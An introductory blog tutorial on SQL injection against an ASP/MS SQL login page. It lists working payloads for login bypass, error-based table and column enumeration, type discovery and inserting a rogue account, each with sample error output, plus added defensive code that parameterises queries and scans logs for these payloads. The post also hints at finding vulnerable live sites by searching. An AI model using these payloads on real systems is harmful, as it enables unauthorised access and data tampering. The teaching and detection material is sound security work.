So firstly, let me just say that this is by no means a “How To” post on SQL Injection. This is more of a very basic primer, or an introduction to SQL Injection. Secondly, I would like to thank the guys at Offensive Security for the following information (I hope this isn’t stepping on anyone’s toes – this is my take on the whole concept); it’s a topic covered in the Pentesting with BackTrack course they have on offer. Finally, please don’t try this on anyone’s systems!! If you want to learn more about this please get something like WebGoat or configure your own server to practice this on!! One last thing, I will not go into detail here on how/why some of these things work; Wikipedia and a host of other sites can explain this all a lot better than me (I’m no SQL injection expert) and there are many many books (big scary books) that will walk you through this concept. With that out of the way, let’s move on.

Now firstly, you want to be able to test a site for the SQL Injection vulnerability. To do this, go to a site (that you feel may be vulnerable – I’m sure you could use some ninja type googling skills to make things easier) and put the following code into the Username field. (We’ll be assuming you’re running this against an ASP page that goes to a MS SQL backend.)

NOTE: For some reason when I post a double dash it sometimes shows as a single “-”. All of the commands below end with a double dash, “--”.

' or 1=1--

If the site is vulnerable you will receive an error page with an error of the form “Unclosed quotation mark before the character string '' and some_string=''” (or very similar – some_string will be different). Good work, we’re in business!!
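To make the two halves of that first test concrete (why the probe logs you in, and why the error page matters), here is an added example that is not code from the post. It stands in an in-memory SQLite database for the ASP/MS SQL backend the post describes, uses the post’s tblCust table and column names with a constructed row, and puts the string-concatenated login query beside a parameterised one. The login_page function is a made-up stand-in for the ASP handler, with a switch for whether raw database errors are echoed to the client.

```python
import sqlite3

# Added example, not code from the post. SQLite stands in for MS SQL Server so the
# snippet runs offline; table and column names follow the post's tblCust example,
# and the single customer row is constructed.
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE tblCust (cust_id TEXT, cust_name TEXT, "
        "cust_password TEXT, cust_account TEXT)"
    )
    conn.execute("INSERT INTO tblCust VALUES ('1', 'alice', 's3cret', 'acct-1')")
    conn.commit()
    return conn


def login_vulnerable(conn, username, password):
    """The pattern the post exploits: user input spliced straight into the SQL text."""
    sql = ("SELECT cust_name FROM tblCust WHERE cust_name = '" + username
           + "' AND cust_password = '" + password + "'")
    return conn.execute(sql).fetchone() is not None


def login_safe(conn, username, password):
    """Parameterised query: the values travel separately from the statement, so a
    quote or a comment marker in the input stays data and never becomes SQL."""
    sql = "SELECT cust_name FROM tblCust WHERE cust_name = ? AND cust_password = ?"
    return conn.execute(sql, (username, password)).fetchone() is not None


def login_page(conn, username, password, verbose_errors):
    """Hypothetical stand-in for the ASP login handler's response body. With
    verbose_errors=True the raw database error reaches the browser, which is the
    leak the post's whole enumeration depends on; with False the client only ever
    sees a generic message and the error goes to the server log instead."""
    try:
        ok = login_vulnerable(conn, username, password)
    except sqlite3.Error as exc:
        # In a real handler: log exc server-side, never echo it to the client.
        return f"Error: {exc}" if verbose_errors else "Login failed"
    return "Welcome" if ok else "Login failed"


if __name__ == "__main__":
    db = make_db()
    probe = "' or 1=1--"
    print("vulnerable:", login_vulnerable(db, probe, "anything"))  # True: bypassed
    print("parameterised:", login_safe(db, probe, "anything"))    # False: rejected
    print(login_page(db, "'", "x", verbose_errors=True))           # raw error leaks
    print(login_page(db, "'", "x", verbose_errors=False))          # generic message
```

The vulnerable query ends up as `... WHERE cust_name = '' or 1=1--' AND cust_password = 'anything'`, so the comment marker discards the password check and `1=1` matches every row; the parameterised version compares the literal string and finds nothing. A lone quote breaks the statement, and whether that breakage is visible to the client is exactly the difference between a site that can be enumerated by the method below and one that just says “Login failed”.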

Next, we want to start enumerating tables. We can do this by replacing our previous command with the following:

' having 1=1--

We should get an error similar to the following (not identical – the ASP pages will differ):

Error Type:

Microsoft OLE DB Provider for SQL Server (0x80040E14)

Column 'tblCust.cust_id' is invalid in the select list because it is not contained in an aggregate function and there is no GROUP BY clause.

/login-off.asp, line 11

AWESOME!! Our first table and column are identified: tblCust.cust_id

Let’s keep enumerating them, shall we?? We now change our command to a “group by” command and start stringing our column names together. Each time we discover a new column name we add it to the group by list, and the next error reveals another column. When we have discovered all the columns the error goes away and we get a plain failed login attempt. You can follow this through the few commands and errors below.

' group by tblCust.cust_id having 1=1--

Error Type:

Microsoft OLE DB Provider for SQL Server (0x80040E14)

Column 'tblCust.cust_name' is invalid in the select list because it is not contained in either an aggregate function or the GROUP BY clause.

' group by tblCust.cust_id, tblCust.cust_name having 1=1--

Error Type:

Microsoft OLE DB Provider for SQL Server (0x80040E14)

Column 'tblCust.cust_password' is invalid in the select list because it is not contained in either an aggregate function or the GROUP BY clause.

' group by tblCust.cust_id, tblCust.cust_name, tblCust.cust_password having 1=1--

Error Type:

Microsoft OLE DB Provider for SQL Server (0x80040E14)

Column 'tblCust.cust_account' is invalid in the select list because it is not contained in either an aggregate function or the GROUP BY clause.

' group by tblCust.cust_id, tblCust.cust_name, tblCust.cust_password, tblCust.cust_account having 1=1--

We now get no more errors, just a failed login attempt: we have enumerated all the column names.

Next, we want to enumerate all of the column types. We do this so that when we later exploit this vulnerability, we can ensure that the data we try to push into a particular column matches what it is expecting.

We do this using a union select with sum() over each column. Applying sum() to a column that is not numeric makes the server complain and name the data type it found, so we repeat this for each of the column names we previously enumerated. You can see it in use below.

' union select sum(cust_id) from tblCust --

Error Type:

Microsoft OLE DB Provider for SQL Server (0x80040E07)

The sum or average aggregate operation cannot take a varchar data type as an argument.

TYPE=varchar

' union select sum(cust_name) from tblCust --

Error Type:

Microsoft OLE DB Provider for SQL Server (0x80040E07)

The sum or average aggregate operation cannot take a varchar data type as an argument.

TYPE=varchar

' union select sum(cust_password) from tblCust --

Error Type:

Microsoft OLE DB Provider for SQL Server (0x80040E07)

The sum or average aggregate operation cannot take a varchar data type as an argument.

TYPE=varchar

' union select sum(cust_account) from tblCust --

Error Type:

Microsoft OLE DB Provider for SQL Server (0x80040E07)

The sum or average aggregate operation cannot take a varchar data type as an argument.

TYPE=varchar

EXCELLENT! We now have the table name, the column names, and the column types.
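Everything from the having trick through the union select works only because the verbose OLE DB error pages shown above come straight back to the client, and each step leaves a very recognisable trace in the logs. The following is an added example, not from the post, of what the defender’s side of this looks like: a small scanner that reads a constructed application log (the key=value format, field names and IP addresses are all made up for this example), flags login attempts whose username carries a quote followed by a SQL keyword or a comment marker, flags the MS SQL error signatures quoted in the post, and reports any source that has triggered several such errors in a row as a likely error-based enumeration.

```python
import re
from collections import defaultdict

# Constructed sample application log, not data from the post: one line per login
# attempt, recording the submitted username and any database error that surfaced.
SAMPLE_LOG = """\
2009-03-01T10:00:01 ip=10.0.0.5 page=/login-off.asp user="alice" status=ok
2009-03-01T10:00:07 ip=10.0.0.9 page=/login-off.asp user="' or 1=1--" status=dberror err="0x80040E14 Unclosed quotation mark before the character string '' and cust_password=''"
2009-03-01T10:00:15 ip=10.0.0.9 page=/login-off.asp user="' having 1=1--" status=dberror err="0x80040E14 Column 'tblCust.cust_id' is invalid in the select list because it is not contained in an aggregate function and there is no GROUP BY clause."
2009-03-01T10:00:22 ip=10.0.0.9 page=/login-off.asp user="' group by tblCust.cust_id having 1=1--" status=dberror err="0x80040E14 Column 'tblCust.cust_name' is invalid in the select list because it is not contained in either an aggregate function or the GROUP BY clause."
2009-03-01T10:00:31 ip=10.0.0.9 page=/login-off.asp user="' union select sum(cust_id) from tblCust --" status=dberror err="0x80040E07 The sum or average aggregate operation cannot take a varchar data type as an argument."
2009-03-01T10:00:40 ip=10.0.0.9 page=/login-off.asp user="'; insert into tblCust values('55555','crudtastic','lazy_pass','bwahaha')--" status=failed
2009-03-01T10:00:45 ip=10.0.0.5 page=/login-off.asp user="o'brien" status=failed
"""

# Hypothetical log layout for this example only.
LINE_RE = re.compile(
    r'^(?P<ts>\S+) ip=(?P<ip>\S+) page=(?P<page>\S+) user="(?P<user>.*?)" '
    r'status=(?P<status>\w+)(?: err="(?P<err>.*)")?$'
)

# A quote on its own is normal in names (o'brien); a quote followed by a SQL
# keyword or statement separator, or a trailing comment marker, is not.
PAYLOAD_RE = re.compile(
    r"'\s*(?:or\b|and\b|having\b|group\s+by\b|union\b|;)|--\s*$", re.IGNORECASE
)

# Signatures of the verbose MS SQL / OLE DB errors quoted in the post.
MSSQL_ERROR_RE = re.compile(
    r"0x80040E(?:14|07)|Unclosed quotation mark|invalid in the select list"
    r"|cannot take a (?:n?varchar|text) data type",
    re.IGNORECASE,
)


def parse_line(line):
    """Return the line's fields as a dict, or None if it does not match the layout."""
    m = LINE_RE.match(line.strip())
    return m.groupdict() if m else None


def classify(event):
    """Tags for one event: injection-looking input and/or a leaked database error."""
    tags = set()
    if PAYLOAD_RE.search(event["user"]):
        tags.add("sqli_payload")
    if event.get("err") and MSSQL_ERROR_RE.search(event["err"]):
        tags.add("verbose_db_error")
    return tags


def analyse(log_text, error_threshold=3):
    """Flag suspicious events and name sources that look like they are enumerating
    the schema through error messages (>= error_threshold leaked errors)."""
    flagged = []
    errors_by_ip = defaultdict(int)
    for raw in log_text.splitlines():
        event = parse_line(raw)
        if event is None:
            continue
        tags = classify(event)
        if not tags:
            continue
        flagged.append((event["ts"], event["ip"], sorted(tags)))
        if "verbose_db_error" in tags:
            errors_by_ip[event["ip"]] += 1
    sources = sorted(ip for ip, n in errors_by_ip.items() if n >= error_threshold)
    return {"flagged": flagged, "enumeration_sources": sources}


if __name__ == "__main__":
    report = analyse(SAMPLE_LOG)
    for ts, ip, tags in report["flagged"]:
        print(ts, ip, ",".join(tags))
    print("error-based enumeration from:", report["enumeration_sources"])
```

The quote-plus-keyword rule keeps the legitimate o'brien login out of the report, while the five attempts from 10.0.0.9 are all flagged and the four leaked errors push that address over the threshold. The same error signatures are also worth alerting on directly in the web server’s own error log: a login page that emits 0x80040E14 more than once in a minute is either broken or being probed, and either way the fix is the same as above (parameterised queries and a generic error page).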

Let’s try and add a user to the database now, mwhahahahahahahaha! We use the following command to do this:

'; insert into tblCust values('55555','crudtastic','lazy_pass','bwahaha')--

cust_id = 55555

cust_name = crudtastic

cust_password = lazy_pass

cust_account = bwahaha

Now let’s see if we can log into the site with the newly created username and password.

IT WORKS!!! Right On!!

So where do we go from here .. good question! The world is your oyster right now!! Well, maybe not really, but you get the idea. There are many MANY more things you can do on a compromised server (your own server of course). Your mission now, if you choose to accept it, is to do some research on the internet and see where you can take this. If you can do something cool with it, drop me a line, I’d love to hear about it!

Please make sure you use this responsibly though .. I know I sound like your mum, but trust me I don’t look anywhere as good as her!